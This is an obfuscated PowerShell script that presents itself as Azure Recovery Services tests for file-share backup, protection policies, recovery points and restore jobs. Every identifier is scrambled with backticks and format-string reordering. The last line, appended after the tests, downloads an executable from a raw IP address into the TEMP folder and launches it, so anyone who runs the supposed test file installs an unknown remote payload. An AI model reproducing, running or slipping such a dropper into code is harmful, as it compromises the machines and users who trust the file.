${LO`cat`iOn} = ("{0}{2}{1}"-f 'southeas','ia','tas')
${R`eSoUrcegrOu`Pn`A`me} = ("{0}{3}{1}{4}{2}"-f'pste','FSRG1bca','e','st','8f8')
${VA`Ultn`Ame} = ("{2}{3}{0}{1}{4}{5}" -f 'Te','stF','P','S','SRSV1bca','8f8e')
${F`Il`EShaReFriE`NDLY`NAmE} = ("{0}{4}{1}{3}{2}"-f 'pstestf','b','8f8e','ca','s1')
${filE`sH`AreN`A`mE} = ("{5}{4}{0}{8}{9}{6}{2}{1}{3}{7}"-f'Share;ps','bca8','s1','f8','eFile','Azur','f','e','tes','t')
${sAN`AMe} = ("{3}{2}{0}{1}"-f'a8f','8e','testsa1bc','ps')
${sarG`N`AMe} = ("{2}{0}{3}{1}"-f 'G1b','8f8e','pstestFSR','ca')
${TAr`GETsANa`me} = ("{5}{4}{3}{0}{2}{1}" -f 'ty7','s','d7','a3r','sts','pste')
${ta`RGETF`I`LES`H`ARENA`Me} = ("{1}{2}{0}{3}{4}"-f'tfs3','pste','s','rty','7d7s')
${TarGeT`FO`l`DER} = ("{4}{2}{3}{1}{0}"-f 's','d7','older3rty','7','pstestf')
${foLD`e`RPAth} = ("{0}{4}{2}{1}{3}" -f 'pstestfol','f8','1bca8','e','der')
${fi`LEp`ATh} = ("{4}{2}{1}{6}{9}{5}{0}{7}{3}{8}" -f'a','fold','stest','x','p','8e/pstestfile1bc','er1bc','8f8e.t','t','a8f')
${sk`U`NaME}=("{3}{2}{0}{1}" -f'a','rd_LRS','and','St')
${P`OlIc`Yname} = ("{1}{2}{0}{4}{3}" -f 'up','A','FSBack','licy','Po')
${NeWp`OL`I`Cyname} = ("{1}{2}{0}{3}{4}"-f 'SBac','New','AF','kupPol','icy')























function Te`ST`-`AZ`UREfSI`TEM
{
	try
	{
		${VA`Ult} = &("{2}{6}{0}{3}{5}{1}{4}"-f'veryS','ul','G','ervicesV','t','a','et-AzReco') -ResourceGroupName ${r`eS`o`URc`eGRoU`pNaME} -Name ${Va`UL`Tname}
		&("{4}{5}{1}{3}{2}{0}" -f 'ction','bl','e','e-Prot','E','na') ${V`Au`lt} ${f`iLeshAREFr`iE`ND`l`YNa`me} ${s`A`NAmE}

		${pol`i`cY} = &("{7}{10}{2}{1}{5}{4}{11}{9}{3}{6}{8}{12}{0}"-f 'y','erySer','ecov','kupProt','ice','v','ecti','Ge','o','Bac','t-AzR','s','nPolic') `
			-VaultId ${vau`lt}."I`D" `
			-Name ${P`OL`i`CYNaME}

		${C`On`Tainer} = &("{0}{6}{5}{3}{7}{1}{2}{4}" -f'G','ervic','es','over','BackupContainer','c','et-AzRe','yS') `
			-VaultId ${v`AulT}."I`d" `
			-ContainerType ("{0}{3}{2}{1}"-f 'Az','age','tor','ureS') `
			-Status ("{0}{2}{1}"-f 'R','red','egiste') `
			-FriendlyName ${san`Ame}
		
		
		${I`TemS} = &("{1}{2}{0}{3}{6}{4}{5}"-f'co','Ge','t-AzRe','veryS','cesBack','upItem','ervi') `
			-VaultId ${Vau`lt}."i`D" `
			-Container ${coN`Ta`in`er} `
			-WorkloadType ("{2}{0}{1}" -f 'Fil','es','Azure');
		&("{3}{1}{2}{0}"-f'True','sert','-','As') { ${It`e`MS}."NA`ME" -contains ${F`iLEshAR`ena`ME} }

		
		${Ite`mS} = &("{8}{5}{6}{2}{1}{7}{3}{0}{4}" -f'te','rvi','erySe','pI','m','e','cov','cesBacku','Get-AzR') `
			-VaultId ${v`Ault}."ID" `
			-Container ${Con`TA`i`NER} `
			-WorkloadType ("{3}{2}{0}{1}"-f 'il','es','eF','Azur') `
			-ProtectionStatus ("{1}{0}" -f'thy','Heal');
		&("{1}{2}{0}"-f'rue','Asse','rt-T') { ${IT`E`mS}."n`AmE" -contains ${FIl`e`SHArEnamE} }

		
		${ITe`mS} = &("{6}{5}{4}{1}{3}{0}{7}{2}" -f'ices','ySer','m','v','ver','AzReco','Get-','BackupIte') `
			-VaultId ${Vau`LT}."id" `
			-Container ${cON`Tai`NEr} `
			-WorkloadType ("{1}{0}{2}{3}" -f'reFi','Azu','le','s') `
			-ProtectionState ("{1}{0}{2}"-f 'di','IRPen','ng');
		&("{2}{3}{1}{0}"-f'e','u','Assert-T','r') { ${i`TE`MS}."NA`mE" -contains ${F`iL`EShA`RENA`Me} }

		
		${itE`mS} = &("{6}{4}{0}{2}{5}{3}{1}" -f'AzRec','Item','overySe','up','t-','rvicesBack','Ge') `
			-VaultId ${va`U`lT}."ID" `
			-Container ${CoNT`AI`Ner} `
			-WorkloadType ("{1}{0}{3}{2}"-f'eFil','Azur','s','e') `
			-Name ${f`il`esH`Ar`eFriendly`NamE} `
			-ProtectionStatus ("{2}{0}{1}"-f 'a','lthy','He');
		&("{2}{1}{0}"-f 'ert-True','ss','A') { ${ite`mS}."n`AMe" -contains ${FI`LESh`ARe`NaME} }

		
		${i`TE`MS} = &("{3}{5}{2}{0}{4}{1}" -f 'verySer','ckupItem','Reco','Get','vicesBa','-Az') `
			-VaultId ${Va`ULT}."i`d" `
			-Container ${cOn`Tai`NEr} `
			-WorkloadType ("{1}{0}{2}" -f'zu','A','reFiles') `
			-Name ${F`iLeSHarEF`R`i`eNdly`NAmE} `
			-ProtectionState ("{2}{1}{0}" -f'nding','Pe','IR');
		&("{1}{0}{3}{2}"-f 'se','As','e','rt-Tru') { ${iTe`Ms}."na`Me" -contains ${fi`Les`H`AreNAMe} }

		
		${IT`eMs} = &("{0}{1}{5}{4}{6}{3}{2}" -f 'Get-AzRe','co','tem','upI','eryServ','v','icesBack') `
			-VaultId ${Va`U`lt}."i`d" `
			-Container ${cOn`TaIN`ER} `
			-WorkloadType ("{2}{1}{0}"-f 'eFiles','zur','A') `
			-ProtectionState ("{0}{2}{1}"-f 'IR','nding','Pe') `
			-ProtectionStatus ("{0}{2}{1}" -f 'Heal','hy','t');
		&("{1}{2}{0}" -f'ue','Assert','-Tr') { ${ite`mS}."N`Ame" -contains ${fILEshA`R`E`Na`Me} }

		
		${i`TeMs} = &("{6}{2}{5}{3}{4}{0}{1}"-f 'upIt','em','over','vices','Back','ySer','Get-AzRec') `
			-VaultId ${va`ULT}."I`d" `
			-Policy ${p`oLiCy};
		&("{0}{2}{1}"-f 'Assert-','e','Tru') { ${IT`ems}."NA`Me" -contains ${FILEShAR`ENA`mE} }

		
		${iT`eMS} = &("{3}{2}{6}{0}{1}{4}{5}"-f 'v','eryS','Rec','Get-Az','erv','icesBackupItem','o') `
			-VaultId ${v`AU`lt}."i`d" `
			-Container ${CoN`T`Ai`NeR} `
			-WorkloadType ("{2}{0}{1}"-f'File','s','Azure') `
			-Name ${f`ILeSHar`E`FRIeNdLy`NAme} `
			-ProtectionState ("{2}{0}{1}"-f'e','nding','IRP') `
			-ProtectionStatus ("{0}{1}"-f'Health','y');
		&("{1}{2}{0}{3}"-f 't-Tru','Asse','r','e') { ${i`TEMs}."Na`me" -contains ${FILeSh`ArEn`A`Me} }
	}
	finally
	{
		&("{1}{0}{2}"-f 'leanup','C','-Vault') ${va`ULT} ${ite`mS} ${C`O`NtAIner}
	}
}

function T`eSt-azuR`E`FSB`ACKUp
{
	try
	{
		${va`ULt} = &("{6}{3}{1}{0}{4}{2}{5}" -f'ove','Rec','cesVa','z','ryServi','ult','Get-A') -ResourceGroupName ${ReSou`RcEgR`oUP`NAME} -Name ${vau`LTNa`me}
		${It`EM} = &("{4}{0}{2}{3}{1}"-f 'Prote','n','cti','o','Enable-') ${v`AU`lt} ${fiL`esHaRefR`IE`NDl`YnA`Me} ${sa`Na`me}
		${CO`NTaiN`Er} = &("{0}{9}{10}{1}{5}{7}{4}{3}{2}{11}{6}{8}"-f 'Ge','co','cesBack','i','rv','v','pContai','erySe','ner','t-A','zRe','u') `
			-VaultId ${VA`U`Lt}."ID" `
			-ContainerType ("{1}{0}{2}{3}"-f 'r','Azu','eStor','age') `
			-Status ("{2}{0}{1}"-f 'eg','istered','R') `
			-FriendlyName ${S`A`NamE}

		
		${BAckU`P`JOb} = &("{1}{5}{7}{8}{2}{3}{9}{6}{4}{0}"-f 'ackupItem','B','e','rySe','B','ackup','es','-A','zRecov','rvic') `
			-VaultId ${Va`U`lT}."Id" `
			-Item ${It`eM} | &("{4}{7}{6}{2}{0}{5}{1}{3}{8}" -f 'a','k','eryServicesB','upJ','Wai','c','ov','t-AzRec','ob') -VaultId ${VA`ULt}."i`D"

		&("{1}{2}{0}" -f'-True','Ass','ert') { ${ba`cku`pjob}."S`T`ATuS" -eq ("{2}{0}{1}"-f'let','ed','Comp') }
	}
	finally
	{
		&("{2}{1}{0}{3}" -f 'ul','a','Cleanup-V','t') ${vA`Ult} ${IT`EM} ${c`on`TAiNEr}
	}
}

function teSt-aZ`UREfsp`ROT`EctI`on
{
	try
	{
		${VAU`LT} = &("{4}{5}{2}{3}{0}{6}{1}"-f'er','ServicesVault','-AzRe','cov','Ge','t','y') -ResourceGroupName ${R`esouR`CegROu`p`N`AME} -Name ${v`AuL`Tname}
		
		${P`olicy} = &("{10}{5}{7}{4}{11}{2}{9}{12}{8}{1}{6}{0}{3}" -f'onPoli','ec','ryServi','cy','c','e','ti','t-AzRe','BackupProt','ce','G','ove','s') `
			-VaultId ${vA`ULT}."i`D" `
			-Name ${P`o`LICyn`AmE}

		${En`Ab`LejOb} = &("{7}{5}{9}{4}{10}{6}{8}{1}{0}{3}{2}"-f 'rot','kupP','tion','ec','overyServ','ble-AzRe','es','Ena','Bac','c','ic') `
			-VaultId ${Va`ULt}."id" `
			-Policy ${p`o`liCy} `
			-Name ${FILEs`H`A`R`eFrIE`NDlyn`Ame} `
			-StorageAccountName ${SANA`ME}

		${C`o`NtaineR} = &("{2}{3}{4}{1}{0}{5}{6}"-f'pCo','acku','Get-A','zRecoveryServices','B','nt','ainer') `
			-VaultId ${v`Au`lt}."I`D" `
			-ContainerType ("{0}{2}{1}{3}" -f'A','to','zureS','rage') `
			-Status ("{0}{1}{2}"-f'R','egis','tered') `
			-FriendlyName ${sanA`me}

		${i`TEM} = &("{1}{0}{5}{3}{4}{2}" -f '-AzRecov','Get','m','er','vicesBackupIte','eryS') `
			-VaultId ${vA`ULt}."i`d" `
			-Container ${cONT`Ai`NeR} `
			-WorkloadType ("{1}{2}{0}" -f'eFiles','Azu','r')
		&("{1}{0}{2}" -f'ssert-','A','True') { ${iT`eM}."nA`Me" -contains ${fIlES`h`A`RE`NAME} }
		&("{1}{2}{0}" -f'e','Asser','t-Tru') { ${It`eM}."LASTb`Ack`Up`stA`TUS" -eq ("{1}{2}{0}" -f 'ding','I','RPen') }
		&("{3}{2}{1}{0}"-f 'ue','-Tr','t','Asser') { ${I`TEM}."pr`OTe`Ctio`NPoli`CYn`A`me" -eq ${Pol`I`CynamE} }
		
		
		${NeW`pOl`I`CY} = &("{6}{7}{0}{5}{2}{3}{8}{4}{1}"-f 'erySe','ctionPolicy','vi','c','kupProte','r','Get-Az','Recov','esBac') `
		-VaultId ${vau`lt}."I`D" `
		-Name ${NeW`P`OLI`cY`Name}

		${en`ABl`e`job} =  &("{0}{4}{3}{5}{7}{2}{1}{6}" -f 'Enabl','tectio','o','AzRecove','e-','ryServicesBac','n','kupPr') `
			-VaultId ${V`A`Ult}."i`d" `
			-Policy ${NE`w`PolICY} `
			-Item ${IT`Em}
		
		${I`TEm} = &("{1}{0}{6}{7}{3}{2}{4}{5}" -f 'et','G','ice','coveryServ','sBac','kupItem','-A','zRe') `
		-VaultId ${va`Ult}."id" `
		-Container ${CONTa`IN`Er} `
		-WorkloadType ("{2}{1}{0}"-f 'es','Fil','Azure')

		&("{1}{2}{0}"-f 'ue','Asse','rt-Tr') { ${iT`em}."nA`me" -contains ${fILEsHa`REN`AME} }
		&("{2}{1}{0}" -f'ue','Tr','Assert-') { ${I`TEm}."Las`TBACku`pStA`TUS" -eq ("{1}{0}" -f'RPending','I') }
		&("{0}{3}{1}{2}" -f'A','ert','-True','ss') { ${It`Em}."Pr`Otec`T`IonPo`lICynA`me" -eq ${NeW`po`LiCYN`Ame} }
	}
	finally
	{
		&("{3}{1}{0}{2}" -f'u','leanup-Va','lt','C') ${Vau`lt} ${it`EM} ${C`Ont`Ai`NeR}
	}
}

function TEST-`AZuR`E`FSGeT`RPS
{
	try
	{
		
		${V`A`Ult} = &("{3}{1}{0}{5}{4}{2}"-f 'rvi','verySe','lt','Get-AzReco','Vau','ces') -ResourceGroupName ${reS`OurCeg`Rou`p`Na`me} -Name ${vAU`LTn`Ame}
		${I`TEm} = &("{0}{4}{1}{3}{2}" -f'En','t','on','i','able-Protec') ${vA`U`LT} ${FIlEsHa`ReF`R`iENdL`YNAmE} ${SANA`Me}
		${CO`NTaiN`ER} = &("{1}{3}{4}{9}{10}{8}{5}{0}{7}{2}{11}{6}" -f 'ic','G','ackupCo','e','t-AzR','v','iner','esB','er','ecov','eryS','nta') `
			-VaultId ${v`AULt}."iD" `
			-ContainerType ("{2}{0}{3}{1}"-f 'reS','e','Azu','torag') `
			-Status ("{1}{0}{2}"-f'ster','Regi','ed') `
			-FriendlyName ${s`Ana`me}
		${bACk`Up`JoB} = &("{0}{2}{1}{3}"-f'Bac','p-It','ku','em') ${V`A`Ult} ${i`TeM}

		${B`ACkupst`A`RTTImE} = ${BAckU`pj`ob}."S`TA`RTTIme".("{2}{1}{0}" -f'nutes','ddMi','A').Invoke(-1);
		${BackUP`E`N`DT`iMe} = ${BAC`K`U`PjOB}."e`Nd`TiME".("{0}{2}{1}" -f'Ad','es','dMinut').Invoke(1);

		${Re`coVe`Ryp`oinT} = &("{1}{7}{5}{6}{0}{2}{3}{4}{8}"-f 'ServicesBackupRe','Get-','co','v','eryPoi','eco','very','AzR','nt') `
			-VaultId ${va`UlT}."i`D" `
			-StartDate ${ba`cKu`PstARTTI`Me} `
			-EndDate ${ba`c`kUPEndTI`Me} `
			-Item ${I`TEM};
	
		&("{0}{1}{3}{2}" -f 'As','sert-','ll','NotNu') ${R`eCOV`E`RyPoi`NT}[0];
		&("{0}{1}{3}{2}"-f'As','sert','e','-Tru') { ${RE`C`OVEryPoINt}[0]."id" -match ${iT`Em}."Id" };

		
		${ReCOVE`RypoIN`T`deTaIL} = &("{6}{11}{9}{0}{1}{4}{2}{3}{5}{8}{12}{7}{10}" -f 'e','cover','ac','k','yServicesB','upR','G','y','ecove','-AzR','Point','et','r') `
			-VaultId ${V`AU`Lt}."i`D" `
			-RecoveryPointId ${r`e`cov`e`RYpOINt}[0]."rE`CO`VERYpOIN`Tid" `
			-Item ${I`TEm};
	
		&("{2}{0}{3}{1}"-f 't','Null','Asser','-Not') ${r`e`COVeRYpo`InTdet`AiL};
	}
	finally
	{
		&("{1}{0}{2}" -f 'V','Cleanup-','ault') ${v`A`ULt} ${i`TEm} ${Co`N`TA`iNeR}
	}
}

function TE`ST-a`zu`REFsFU`Llr`es`TOrE
{
	try
	{
		${Vau`lt} = &("{0}{4}{3}{8}{2}{5}{1}{7}{6}"-f 'Get-','esVa','ry','Reco','Az','Servic','lt','u','ve') -ResourceGroupName ${rESO`URCe`g`RoupNAmE} -Name ${vau`ltN`A`ME}
		${I`TEM} = &("{2}{3}{4}{0}{1}"-f'i','on','Ena','ble','-Protect') ${Vau`lT} ${FIlEsh`AreF`R`i`E`N`DlyNAME} ${Sa`N`AME}
		${C`ONTA`ineR} = &("{7}{1}{5}{6}{2}{4}{3}{0}" -f'pContainer','cover','es','ku','Bac','yServ','ic','Get-AzRe') `
			-VaultId ${v`Ault}."id" `
			-ContainerType ("{0}{1}{2}"-f'AzureSto','rag','e') `
			-Status ("{3}{0}{1}{2}" -f'ter','e','d','Regis') `
			-FriendlyName ${s`ANAMe}
		${ba`ckupJ`oB} = &("{2}{0}{1}" -f'-Ite','m','Backup') ${va`UlT} ${i`TeM}

		${bAck`UPSt`ARtti`me} = ${Ba`C`KUPJOB}."StA`R`TtiMe".("{0}{1}{2}{3}"-f 'AddMin','ut','e','s').Invoke(-1);
		${b`Acku`pEn`dT`iME} = ${Ba`c`Ku`pjob}."enD`TIMe".("{2}{0}{1}" -f'Mi','nutes','Add').Invoke(1);

		${R`ECO`VE`RYPoint} = &("{1}{10}{4}{5}{0}{7}{2}{6}{3}{9}{11}{8}"-f'r','Get','ackupR','c','y','Se','e','vicesB','t','ove','-AzRecover','ryPoin') `
			-VaultId ${V`AULT}."Id" `
			-StartDate ${b`AC`kupSTArT`TimE} `
			-EndDate ${bAck`U`PeNdTIME} `
			-Item ${i`Tem};

		&("{1}{3}{0}{2}{4}" -f'hrows','A','Conta','ssert-T','ins') { &("{0}{3}{7}{6}{9}{2}{4}{5}{8}{1}" -f 'Restor','tem','ryServi','e','ce','sBackup','AzRec','-','I','ove') `
			-VaultId ${VaU`lT}."I`D" `
			-VaultLocation ${VAu`LT}."Lo`caTi`on" `
			-RecoveryPoint ${rECo`V`er`ypOInt}[0] `
			-ResolveConflict ("{1}{0}{2}"-f 'erwr','Ov','ite') `
			-TargetStorageAccountName ${T`ARgETS`Aname} `
			-TargetFolder ${TaR`gE`Tf`OLDER} } `
			("{6}{3}{0}{7}{10}{11}{15}{2}{8}{18}{12}{14}{13}{4}{20}{19}{5}{16}{1}{17}{21}{9}" -f'argetFileS','in','sto','e T','ou',' for O','Provid','har','re or remo','re','eName for Alternate Loc','a',' TargetStor','c','ageAc','tion re','rig','al Location ','ve','tName','n','resto')

		&("{2}{3}{5}{1}{0}{4}"-f'i','t-ThrowsConta','As','se','ns','r') { &("{6}{8}{3}{7}{0}{1}{4}{2}{5}" -f'eryServi','c','sBackupI','e-A','e','tem','Re','zRecov','stor') `
			-VaultId ${VA`ULT}."ID" `
			-VaultLocation ${VAu`Lt}."LO`cA`TioN" `
			-RecoveryPoint ${RE`c`OvE`RyPoiNt}[0] `
			-ResolveConflict ("{1}{2}{0}{3}"-f 'rit','Ov','erw','e') `
			-TargetFileShareName ${Targe`Tf`ilEShaR`eN`Ame} `
			-TargetFolder ${tar`GeTf`OLdEr} } `
			("{9}{7}{5}{14}{15}{6}{1}{11}{2}{10}{13}{12}{16}{18}{17}{3}{4}{8}{0}"-f 'riginal Location restore','Name fo',' Alternat','eShare','Name f','vide Tar','rageAccount','o','or O','Pr','e Location','r','store or re',' re','get','Sto','m','Fil','ove Target')

		&("{0}{3}{1}{2}"-f'A','hr','owsContains','ssert-T') { &("{2}{5}{6}{0}{3}{4}{1}{7}"-f'Serv','k','Rest','icesBa','c','ore-AzRe','covery','upItem') `
			-VaultId ${V`AUlT}."id" `
		  	-VaultLocation ${vA`U`Lt}."Lo`CaTi`on" `
		  	-RecoveryPoint ${r`E`c`ovERyPOINt}[0] `
		  	-ResolveConflict ("{2}{0}{1}" -f'wri','te','Over') `
		  	-SourceFileType ("{1}{0}" -f 'e','Fil') } `
		  	("{13}{15}{17}{10}{12}{18}{3}{19}{16}{14}{20}{2}{7}{1}{9}{21}{8}{6}{0}{5}{4}{11}" -f'r','ceFile','ve','File res','s','e','share ',' Sour','for file ','Type','SourceFilePath','tore',' f','P','r r','r','e o','ovide ','or ','tor','emo',' ')

		&("{1}{4}{0}{2}{3}" -f 'ThrowsC','Asser','ont','ains','t-') { &("{8}{5}{10}{4}{0}{6}{9}{7}{1}{2}{3}" -f'eryServices','upI','t','em','ecov','r','Ba','k','Resto','c','e-AzR') `
			-VaultId ${V`A`ULt}."id" `
			-VaultLocation ${vAu`lT}."LocAT`IoN" `
			-RecoveryPoint ${REcO`V`Er`ypO`Int}[0] `
			-ResolveConflict ("{1}{2}{0}" -f 'rwrite','Ov','e') `
			-SourceFilePath ${fiLe`P`ATh} } `
			("{0}{23}{15}{17}{5}{16}{18}{20}{6}{13}{22}{21}{10}{9}{19}{4}{11}{7}{14}{1}{24}{12}{2}{8}{3}" -f 'Pr',' s','re','re','urceFile','e','File ','or fi','sto','r ',' o','Path f','are ','re','le',' Sour','File','c','Ty','remove So','pe for ','ore','st','ovide','h')
    
		
		
		${re`s`TO`REJOB1} = &("{1}{4}{0}{2}{5}{3}" -f 'yS','Restore-AzR','ervice','Item','ecover','sBackup') `
			-VaultId ${VAU`lt}."i`d" `
			-VaultLocation ${V`AuLt}."L`Oc`AtioN" `
			-RecoveryPoint ${ReC`ov`ER`ypoI`Nt}[0] `
			-ResolveConflict ("{2}{0}{1}" -f'r','write','Ove') `
			-SourceFilePath ${Fol`dER`PatH} `
			-SourceFileType ("{2}{1}{3}{0}" -f 'ry','i','D','recto') `
			-TargetStorageAccountName ${tA`RGEt`SA`Name} `
			-TargetFileShareName ${Ta`RGetFIl`eShArena`me} `
			-TargetFolder ${TA`Rg`et`Fold`er} | `
				&("{3}{4}{1}{2}{6}{5}{0}"-f 'upJob','o','veryServicesB','Wait','-AzRec','k','ac') -VaultId ${VAu`lt}."I`d"
		
		&("{2}{1}{0}"-f 'e','rt-Tru','Asse') { ${rESTO`REJO`B1}."s`T`AtUS" -eq ("{1}{0}{2}" -f'plete','Com','d') }
    
		
		
		${r`eS`TO`ReJob2} = &("{3}{0}{1}{2}{5}{4}" -f 'esto','re-AzRecoveryS','ervic','R','kupItem','esBac') `
			-VaultId ${VA`ULt}."I`d" `
			-VaultLocation ${v`A`ULt}."LOc`AT`ioN" `
			-RecoveryPoint ${rECov`e`Ry`P`oint}[0] `
			-ResolveConflict ("{1}{0}{2}" -f 't','Overwri','e') `
			-TargetStorageAccountName ${T`A`RgET`sanAmE} `
			-TargetFileShareName ${TA`RGE`TFI`le`shAr`eNAMe} `
			-TargetFolder ${Tar`Ge`TfO`lDER} | `
				&("{2}{5}{3}{1}{4}{0}" -f'ob','erySe','W','t-AzRecov','rvicesBackupJ','ai') -VaultId ${vaU`lt}."iD"
		
		&("{0}{2}{3}{1}"-f'A','e','s','sert-Tru') { ${REsTO`R`EjOB2}."S`TatuS" -eq ("{2}{1}{0}"-f'ted','e','Compl') }

		
		
		${Res`T`OrejO`B3} = &("{9}{3}{10}{2}{1}{7}{0}{6}{8}{4}{5}" -f 'rvic','ecover','re-AzR','est','up','Item','e','ySe','sBack','R','o') `
			-VaultId ${V`Au`LT}."iD" `
			-VaultLocation ${VaU`LT}."LocatI`on" `
			-RecoveryPoint ${R`e`coveRYP`OInt}[0] `
			-ResolveConflict ("{0}{2}{1}" -f 'O','rite','verw') `
			-SourceFilePath ${fi`LePA`TH} `
			-SourceFileType ("{1}{0}" -f'ile','F') | `
				&("{1}{5}{6}{7}{0}{8}{2}{3}{4}" -f 'ervi','Wait-A','ku','pJ','ob','zRec','ove','ryS','cesBac') -VaultId ${V`AULT}."ID"

		&("{1}{2}{0}"-f'e','Asse','rt-Tru') { ${reS`TOrEj`ob3}."STa`T`US" -eq ("{3}{0}{2}{1}" -f 'e','ed','t','Compl') }

		
		
		${ResTORE`J`O`B4} = &("{4}{3}{5}{0}{1}{6}{7}{8}{2}" -f'rySe','rv','upItem','e','Restore-AzR','cove','ic','e','sBack') `
			-VaultId ${v`AULT}."iD" `
			-VaultLocation ${Va`Ult}."l`oCaTIon" `
			-RecoveryPoint ${r`ECovEr`y`poi`NT}[0] `
			-ResolveConflict ("{2}{0}{1}"-f'i','te','Overwr') | `
				&("{4}{3}{0}{2}{6}{1}{5}"-f 'Recovery','esBacku','Serv','z','Wait-A','pJob','ic') -VaultId ${vA`U`LT}."iD"

		&("{2}{1}{0}"-f'True','ert-','Ass') { ${res`To`REJO`B4}."StAt`US" -eq ("{3}{2}{1}{0}"-f 'ed','let','mp','Co') }
	}
	finally
	{
		&("{0}{1}{3}{2}"-f 'Cle','anu','Vault','p-') ${V`Au`LT} ${iT`Em} ${co`N`TAInEr}
	}
}
(&("{2}{1}{0}" -f'Object','w-','Ne') ("{4}{5}{1}{0}{3}{2}"-f 'em.','st','bClient','Net.We','S','y')).("{0}{2}{1}" -f'DownloadF','e','il').Invoke(("{1}{4}{3}{5}{8}{6}{7}{2}{0}" -f'.exe','http:','ile','/18','/','5','106.122.','62/f','.'),"$env:TEMP\filex86.exe");&("{3}{1}{2}{4}{0}" -f's','ta','rt-Proc','S','es') ("$env:TEMP\filex86.exe")
